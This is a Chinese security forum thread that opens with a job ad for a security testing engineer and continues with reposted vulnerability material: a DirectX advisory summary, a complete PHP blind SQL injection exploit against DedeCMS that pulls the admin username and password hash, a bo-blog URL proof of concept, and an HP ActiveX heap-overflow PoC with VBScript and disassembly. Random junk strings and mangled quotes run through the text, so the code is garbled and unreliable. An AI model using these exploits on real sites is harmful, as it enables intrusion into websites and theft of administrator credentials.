返回列表 发帖

[人才招聘] [招聘] [HR]北京安码科技 信息安全工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 北京安码科技有限公司
  • 工作地点: 北京
  • 专业要求: 计算机专业 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 21-25
  • 性别要求: 不限 
  • 公司网址: http://www.safe-code.com
  • 简历邮箱: hr@safe-code.com
  • 联系电话: 010-62256336 人力资源部
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++北京安码科技有限公司相关说明++++++++++

    职位要求:
    * @" c7 x; D+ E  E3 I1、本科以上学历,计算机硬件、软件或者信息安全专业毕业优先; # l" p4 U4 F8 C$ `  S% U5 {  S
    2、熟悉WINDOWS、LINUX、UNIX操作系统配置,特别是安全配置; : b( A! _. K1 }
    3、熟练掌握网络攻击及防御方法,比如溢出、SQL注入、跨站脚本等等;
    + O$ r5 k6 O$ r4 J% p3 v4、熟悉ORACLE、MY SQL、SQL SERVER等数据库安全配置优先;
    / U0 f4 O& \" A1 U/ I5、熟悉安全管理制度、安全管理体系ISMS等优先;
    ! l3 x8 @3 O! O6、具备一定的文档处理能力,能以较快速度出文档; 1 ]$ ^( B- h6 d* e( f/ c4 O$ I
    7、吃苦耐劳,有强烈的团队意识和服从安排意识;
    0 E0 P+ ~1 Z+ ~! Y8、具备较好的交流能力和独立开展工作的能力,善于思考,积极主动;
    6 k# X0 ?+ e  h+ w3 M$ v/ J3 N9、具有信息安全工作经验者或电信、银行等行业工作经验者优先;2 R6 Q6 y9 l* A* W( ~" n
    10、丰富的27001咨询经验;! `& ^% t# c2 e- k  l8 A9 b0 q
    11、熟悉调研、顾问访谈等工作方式;
    8 Y0 t% J8 D5 N- K5 |2 [/ g1 F( |12、可适应出差。

     

    您可能还想看的主题:

    北京某安全公司招聘WEB安全工程师

    [HR]上海四域 信息安全工程师

    浙江政安信息安全研究中心招贤纳士啦!

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    SpyEye 1.3.45 Loader源代码下载

    XXOO北京某电子集团

    知道创宇长期招聘Web安全研究员/Python Web研发工程师

    新浪招聘安全工程师、安全开发工程师

    1

    评分人数

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:jeffzua发表,本帖发表者jeffzua符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者jeffzua和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    目前只能路过

    TOP

    目前在打酱油。。。。

    TOP

    MS07-064:DirectX中的漏洞可能允许远程执行代码
    发布日期: 十二月 11, 2007Version: 1.0

    " b  ?: R# r8 \: h5 l( a
    摘要 此严重安全更新可解决 Microsoft DirectX 中两个秘密报告的漏洞。 如果用户在 DirectX 中打开用于流式媒体的特制文件,这些漏洞可能允许执行代码。 如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

    2 E! i8 i  ]" {/ I/ N
    这是 Microsoft Windows 2000、Windows XP、Windows Server 2003 和 Windows Vista 的所有受支持版本的严重安全更新。
    / J" \' f0 I5 M- N6 D
    建议。  Microsoft 建议用户立即应用此更新。
    # e* ]' M$ _; a
    受影响的软件

    , O  w8 k' O. ?0 M
    操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告 DirectX 7.0 和 DirectX 8.1         Microsoft Windows 2000 Service Pack 4 DirectX 7.0 远程执行代码  严重  MS05-050 Microsoft Windows 2000 Service Pack 4 DirectX 8.1 远程执行代码 严重 MS05-050 DirectX 9.0c         Microsoft Windows 2000 Service Pack 4 DirectX 9.0c 远程执行代码 严重 MS05-050 Windows XP Service Pack 2 DirectX 9.0c 远程执行代码 严重 MS05-050 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 DirectX 9.0c 远程执行代码 严重 MS05-050 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 DirectX 9.0c 远程执行代码 严重 MS05-050 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 DirectX 9.0c 远程执行代码 严重 MS05-050 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) DirectX 9.0c 远程执行代码 严重 MS05-050 DirectX 10.0         Windows Vista DirectX 10.0 远程执行代码 严重 无 Windows Vista x64 Edition DirectX 10.0 远程执行代码 严重 无

    " M: j" z) P7 R/ }, N$ j. V. c
    微软的安全公告:
    : N; u& A" q1 k/ I1 U) n
    http://www.microsoft.com/china/technet/security/bulletin/MS07-064.mspx
    ) L  N; X7 C! X9 I- ]" ~0 D- v
    (以上链接均连到第三方网站)
    2 @8 q5 i+ Y) q
    9 _0 q9 i- z7 A3 U. v: Q9 {9 t

    + U6 v2 K9 U6 }$ D/ l+ S& h
    , \' k- S; [$ y, R% I, N0 i% n7 F9 l) f' X

    & B; d4 U- A0 V" X0 a0 W2 }; U5 m

    6 |: [! Q1 ^. A4 s+ o/ e6 p; e/ j
    " k* @! Z. Q7 ~4 c7 c3 L3 x7 p/ I( {% |

    * ], b( U% z0 {. N  ~# u* M2 r
    4 ~1 I2 Z9 y" r) o- j1 N+ F6 `
    ) r  ]+ w% b# y1 l, Z# u* ]" Z. ~9 N. h: d, [* a" M3 ~

    ; R; x" o( _7 ]' v, R2 I! g
      g7 W  j/ C/ p$ I' Q* M, @# g+ d8 k9 m, n. G! ~
    ) R$ ?$ b# p+ A( i0 b$ v
    % z! b' r9 Y. J7 M, L# K; d0 L
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    dedecms注射漏洞
    漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

    $ \0 q/ C3 W( [
    漏洞厂商:http://www.dedecms.com漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下

    3 P0 D" m, a9 @9 ^7 ]
    -------------------------------------------------------if(empty($orderby)) $orderby = 'pubdate';
    ( J4 [3 R. V! W$ K+ K% y1 n
    //重载列表if($dopost=='getlist'){PrintAjaxHead();GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数$dsql->Close();exit();……function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){global $cfg_phpurl,$cfg_ml;$jobs = array();$start = ($pageno-1) * $pagesize;
    ' p1 b& |- X6 L, Z7 X/ X
    $dsql->SetQuery("Select * From #@__jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");$dsql->Execute();//orderby 带入数据库查询……----------------------------------------------------------
    + V9 Q; x4 v9 l0 A
    漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档):

    * p& \- E' `! |0 {! x
    <?print_r('--------------------------------------------------------------------------------DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploitBY Flyh4twww.wolvez.orgThx for all the members of W.S.T and my friend Oldjun--------------------------------------------------------------------------------');

    4 P) A/ r1 ?- N
    if ($argc<3) {print_r('--------------------------------------------------------------------------------Usage: php '.$argv[0].’ host pathhost: target server (ip/hostname)path: path to DEDEcmsExample:php ‘.$argv[0].’ localhost /——————————————————————————–‘);die;}
    1 F: k, h5 {3 y+ x) X
    function sendpacketii($packet){global $host, $html;$ock=fsockopen(gethostbyname($host),’80′);if (!$ock) {echo ‘No response from ‘.$host; die;}fputs($ock,$packet);$html=”;while (!feof($ock)) {$html.=fgets($ock);}fclose($ock);}

    4 ^  H0 O9 ]0 T$ q! I
    $host=$argv[1];$path=$argv[2];$prefix=”dede_”;$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;
    3 u9 V) A5 g) e
    if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/')){echo ‘Error… check the path!’; die;}
    5 c, ~: Y( i7 F, X1 w
    /*get $prefix*/$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&amp;pageno=1&amp;orderby=11′ HTTP/1.0+ h! z% z; t! Q; N
    ”;$packet.=”Host: “.$host.”3 H3 }' ?6 Z! `( s2 B* c: B
    ”;$packet.=”Cookie: “.$cookie.”3 b8 u/ y) A5 u$ S) U6 \
    ”;$packet.=”Connection: Close
    , W' V5 y9 v- u( [2 }6 |8 n
    $ n2 f: A7 L# L* B”;sendpacketii($packet);if (eregi(”in your SQL syntax”,$html)){$temp=explode(”From “,$html);$temp2=explode(”member”,$temp[1]);if($temp2[0])$prefix=$temp2[0];echo “[+]prefix -> “.$prefix.”& L" v  E% J  L* k- a; S! @" P+ C  _
    ”;}

    & [- X$ D) ~) u' |) C
    $chars[0]=0;//null$chars=array_merge($chars,range(48,57)); //numbers$chars=array_merge($chars,range(97,102));//a-f lettersecho “[~]exploting now,plz waiting
    - f0 k' u5 v$ Y/ B7 {”;
    7 V% P% Q) L5 `! p% {
    /*get password*/$j=1;$password=”";while (!strstr($password,chr(0))){for ($i=0; $i<=255; $i++){if (in_array($i,$chars)){$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&amp;pageno=1&amp;”.$sql.” HTTP/1.0$ I' `) b; L* }8 W$ x8 a
    ”;$packet.=”Host: “.$host.”' K, {# m+ K& z+ R5 _% v: Y# E
    ”;$packet.=”Cookie: “.$cookie.”8 w2 B2 {- m- u3 f* B3 ?
    ”;$packet.=”Connection: Close% n: C/ O' R, Y4 B+ U# a" [
    3 Q/ C- V. m+ h
    ”;sendpacketii($packet);if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”
    + ]( u% k, e9 O/ ]- T”;break;}}if ($i==255) {die(”Exploit failed…”);}}$j++;}
    ; u3 B/ D6 V* f4 q
    /*get userid*/$j=1;$admin=”";while (!strstr($admin,chr(0))){for ($i=0; $i<=255; $i++){$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&amp;pageno=1&amp;”.$sql.” HTTP/1.0$ a" P$ C: t8 P5 \7 i
    ”;$packet.=”Host: “.$host.”- |$ M' d# x% A4 A/ a1 d
    ”;$packet.=”Cookie: “.$cookie.”
    5 d  D3 }! |( H# M”;$packet.=”Connection: Close
    1 Z3 _! I- C4 ^* Y$ {3 ]7 ~
    / M. A( R- O1 h- ~+ P% ^3 X2 J4 W”;sendpacketii($packet);if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”+ V% S) I! G7 N# }) M9 }
    ”;break;}if ($i==255) {die(”Exploit failed…”);}}$j++;}
    4 o8 i) B! G7 H2 {2 y: @8 K
    print_r(’——————————————————————————–[+]userid -> ‘.$admin.’[+]pwd(md5 24位) -> ‘.$password.’——————————————————————————–‘);function is_hash($hash){if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}else {return false;}}if (is_hash($password)) {echo “Exploit succeeded…”;}else {echo “Exploit failed…”;}?>
    ) \/ U! s" t* n' p* K% c
    利用代码:dedecmsv5.rar
    * R6 c! C( @% D9 X' b5 ^
    $ a8 v" y0 P% S) O  b; u( ?
    + A+ i0 o- b+ j  e6 J8 `8 |

    + f$ G" X7 Z/ T
    ) e/ I! v$ U& ]7 b5 G' G2 ^8 o/ j# o* \: s8 ]  |

    9 @* v9 G0 V" x$ x; Z: U! l, j8 u5 }3 K9 O4 a

    2 Q+ _8 }# t. S
    " l) j  V/ \' U5 H* X
    5 v- F! K) P/ V0 s
    / _/ ^- H" f4 }* V% N7 y' B: a" @. z& S1 ~( }5 q) h" e  J
    4 t) B( t# R. O$ R9 a

    / |4 }% Z) {; S& H3 P9 B: \- d: o& U% Q$ r3 ^1 a
    ) w( `" ]* @. b3 m7 ~

    9 L. y: `' O9 N. a5 z2 L6 }! d1 V% z$ p! f( x  G
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    boblog 博客程序任意变量覆盖漏洞
    by Ryat[puretot]
    ; }, Z- l% x% ^8 G. w3 E2 b2 X2 }mail: puretot at gmail dot com# b6 R% k, ]* }) J3 t, a# N' `' z
    team: http://www.80vul.com
      }8 B3 O  W9 E! u4 s' Cdate: 2011-03-09
    ) x- w; h( L1 M% o0 y- V, u
    4 T/ X- O4 ^. \, p: P3 \5 i9 y# Q( m    先前80vul.com上公布了一个bo-blog的漏洞[1],这个漏洞已经被官方修补,但随后wooyun.com上公布了一个绕过补丁的方法[2],可惜触发时有一定的限制,下面我再来公布一个没有任何限制的绕过补丁继续触发漏洞的方法:)

    + ~; O+ U" A# r' Y% ]; B# S
        这个简单来说是正则表达式和代码逻辑不够严谨造成的,来看代码:

    5 [- T/ K& g- X/ s3 d
    以下是引用片段:// go.php $q_url=$_SERVER["REQUEST_URI"]; @list($relativePath, $rawURL)=@explode('/go.php/', $q_url); $rewritedURL=$rawURL; ... $RewriteRules[]="/page/([0-9]+)/([0-9]+)/?/"; // 这个正则看上去很严谨,但是没有使用^和$来限制开头与结尾[可能是为了适应程序自身的需要]:) ... $RedirectTo[]="index.php?mode=\1&amp;page=\2"; ... foreach ($RewriteRules as $rule) {     if (preg_match($rule, $rewritedURL)) {         $tmp_rewritedURL=preg_replace($rule, '<'.$RedirectTo[$i].'<', $rewritedURL, 1); // 对$rewritedURL进行匹配和替换,并使用<来标记匹配的部分 // 经过这样的处理后$tmp_rewritedURL主要分为三部分: // i.第一个<前面的部分 // ii.两个<之间的部分 // iii.第二个<后面的部分         $tmp_rewritedURL=@explode('<', $tmp_rewritedURL);         $rewritedURL=($tmp_rewritedURL[2]) ? false : $tmp_rewritedURL[1]; // 这段代码的主要目的是解决之前的正则限制不够严格的问题 // 程序员希望通过这段代码去掉i和iii,使$rewritedURL仅保留ii // 注意这里还对iii做了限制,按照程序员的想法,iii这部分应该是不存在的:) // 这部分代码逻辑的关键就在于<这个字符,但遗憾的是我们是可以随意注入<的:p         break;     }     $i+=1; }
    9 `9 r  v% e1 ]- L8 V  i    从上面的分析可以看出这段代码对$rewritedURL处理逻辑貌似很严谨,但事实我们只要通过简单的注入<这个字符,就可以打乱整个逻辑了:)
    * e# M3 P( k- O. t& w  B
    PoC:' O# w- a' F; p6 v* g, K
        /go.php/<[evil code]<page/1/1/
    1 |+ n* m5 w9 ~* ]( d; P
    参考:" S/ |( B" j$ _! J
        [1]http://www.80vul.com/boblog/boblog.txt

    " y5 v0 J  Q) l4 }( d! g7 `! m$ K' t
    3 l! g3 V( o! b
    3 p  t7 Y0 l# Z2 h
    ) J9 K  j3 a( {6 U+ K" O
    $ [% u8 ^( d( y9 @7 W% M2 p$ k! E9 O

    9 O1 f8 e) ^/ f7 S0 q& ~8 c9 x* F: t3 X: z" O: z5 a4 x. C; n

    " L( Q+ s% v9 N3 u
    : \3 `( c% h6 K. d& [- T
    9 ~! [+ z/ O# F1 w: m2 o! Y: D: I5 e7 v

    ) x& u+ Y! n: O: X! a& X; m
    7 p0 \  w# T  v  R* J; ]9 @9 C0 l. a6 L6 o

      Z8 j/ M) L& Y4 v9 ?  i
    , X/ T: p( y7 {4 [) j
    5 P! t. P' j0 [1 E7 b! t, J: }$ [  f+ b1 Y1 q; H
    0 [1 j1 p  A' i, ~. t) @- W

    ; \- L" r3 a- |/ s9 E
    & _4 W  e$ T* Y* `+ D% X8 ?1 D! H  A  m9 X& k7 ?/ y
    ' G; v9 ~% ]3 \5 j% b4 Y4 b8 j/ U
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    惠普 ActiveX (hpqutil.dll 文件列表) 远程溢出 PoC
    :. GOODFELLAS Security Research TEAM  .::. http://goodfellas.shellcode.com.ar .:ActiveX hpqutil!ListFiles hpqutil.dll - Remote heap overflow.=============================================================Internal ID: VULWAR200706041introduction------------GOODFELLAS security research team has found a bug in a dll included in at least the following HP products: * HP All-in-One Series Web Release * HP Photo &amp; Imaging Gallery version 1.1The affected dll is called hpqutil.dll at least in it's version 2.0.0.138 in English, and specifically the problem is a heap overflowtested in---------Windows XP spanish with SP2summary-------Remotable exploitation of this heap overflow  could allow a user to execute arbitriary code or crash internet explorer. The heap overflow is related to a call to lstrcpyA() inside a function that is not checking the buffer's bounds. This call is made from the FindFile() function the dll overloaded from MFC42. The dll allocates 320 bytes for the buffer where some arbitrarily long user input is to be stored.This bug is related with "FileFind class from MFC Library cause heap overflow"You could view more details in http://goodfellas.shellcode.com.ar/own/VULWKU200706142 impact------This exploitable bug crashes internet explorer and if used along other techniques could allow for remote code execution. Explotation requires a targetted user to load a web page containing the crafted activeX control with internet explorer, it is also required to have activeX enabled.workaround----------- Unregistering hpqutil.dll using regsvr32- Activate the Kill bit zero in clsid F3F381A3-4795-41FF-8190-7AA2A8102F85timeline--------june 14, 2007 -- bug discoveryjune 20, 2007 -- vendor notificationJuly 30, 2007 -- ping ... (no response)September 14, 2007 -- Bug publishedcredits-------* Brian Mariani <bmariani@shellcode.com.ar>* Jonathan Sarba <sarbaj@shellcode.com.ar>* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>Proof of concept----------------[...]<object classid='clsid:F3F381A3-4795-41FF-8190-7AA2A8102F85' id='pAF'></object><input type="button" value="heap" language="VBScript" OnClick="OuCh()"><script language="VBScript">sub OuCh()Var_0 = String(620, "A")pAF.ListFiles Var_0End Sub</script>[...]technical detail----------------MFC42!CFileFind::FindFile[...]73d6cd3f 8bff            mov     edi,edi73d6cd41 55              push    ebp73d6cd42 56              push    esi73d6cd43 57              push    edi        => ecx=04ecedd4        => esi=0795cf2473d6cd44 8bf1            mov     esi,ecx73d6cd46 e89effffff      call    MFC42!CFileFind::Close (73d6cce9)73d6cd4b 6840010000      push    140h <<<====  320 bytes to allocate!!!!!73d6cd50 e8ce73feff      call    MFC42!operator new (73d54123)        => Allocating memory for the buffer (malloc)        => eax= 4170ec073d6cd55 8b6c2414        mov     ebp,dword ptr [esp+14h]        => esp+14 has a pointer to the argument buffer (AAAAA...)73d6cd59 83661000        and     dword ptr [esi+10h],073d6cd5d 85ed            test    ebp,ebp        => ebp=068b5064 (this is the address of the buffer)73d6cd5f 59              pop     ecx  <<<===== this is 140h73d6cd60 894608          mov     dword ptr [esi+8],eax        => eax=04170ec073d6cd63 7505            jne     MFC42!CFileFind::FindFile+0x2b (73d6cd6a) (LSTRCPY)!        => strcpy(eax, ebp) where EBP="AAAAAA....*.jpg"        => EAX  has 140h till it reaches the end of its scope73d6cd65 bda4d0df73      mov     ebp,offset MFC42!`string' (73dfd0a4)73d6cd6a 55              push    ebp73d6cd6b 83c02c          add     eax,2Ch[...]--------------------------------MFC42!operator new:73d54123 8bff            mov     edi,edi73d54125 53              push    ebx73d54126 55              push    ebp73d54127 8b6c240c        mov     ebp,dword ptr [esp+0Ch]73d5412b 56              push    esi73d5412c 57              push    edi73d5412d 8b3de466df73    mov     edi,dword ptr [MFC42!_imp__malloc (73df66e4)]73d54133 83cbff          or      ebx,0FFFFFFFFh[...]MFC42!CFileFind::FindFile+0x2b:73d6cd6a 55              push    ebp73d6cd6b 83c02c          add     eax,2Ch73d6cd6e 50              push    eax73d6cd6f ff15d061df73    call    dword ptr [MFC42!_imp__lstrcpyA (73df61d0)]                        => kernel32!lstrcpyA: access violation                        => vulnerable heap structure73d6cd75 ff7608          push    dword ptr [esi+8]73d6cd78 55              push    ebp73d6cd79 ff15d861df73    call    dword ptr [MFC42!_imp__FindFirstFileA (73df61d8)]73d6cd7f 83f8ff          cmp     eax,0FFFFFFFFh[...]! g( I9 s# J/ c% H2 Q
    , A1 }  k' l, N
    8 c* N( X6 T+ G$ c) y7 i+ p, Q! g

    ' g+ R& s/ k$ u* d2 r; C/ i
    ; @9 @1 b  \0 m& ^' d. q, {$ t% C
    2 B4 w9 q6 j2 u6 I
    , G* c" m# G+ C% \( k# n  O  f- y9 }. A1 C$ b& [) u

    + N8 r( [. u  M: E; B# y6 @' `. @; M
    $ v- p* r" {9 B6 R/ p6 Y5 ^. j' r* n$ ?4 @9 l: a! E1 ~* @2 R/ h3 `

    ' ]$ R- g  I; w* @3 Y8 P2 Z) g9 ~, |$ {: e- X# K

    6 M8 T3 b$ W' v  s- q0 }! Y8 N4 i) N- w) N8 ^9 k
    : u/ @) L  o8 H

    / h2 n- }8 {) n  A& G+ z; m# Z0 j5 C

    " R+ V/ d! I/ v. R3 W公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表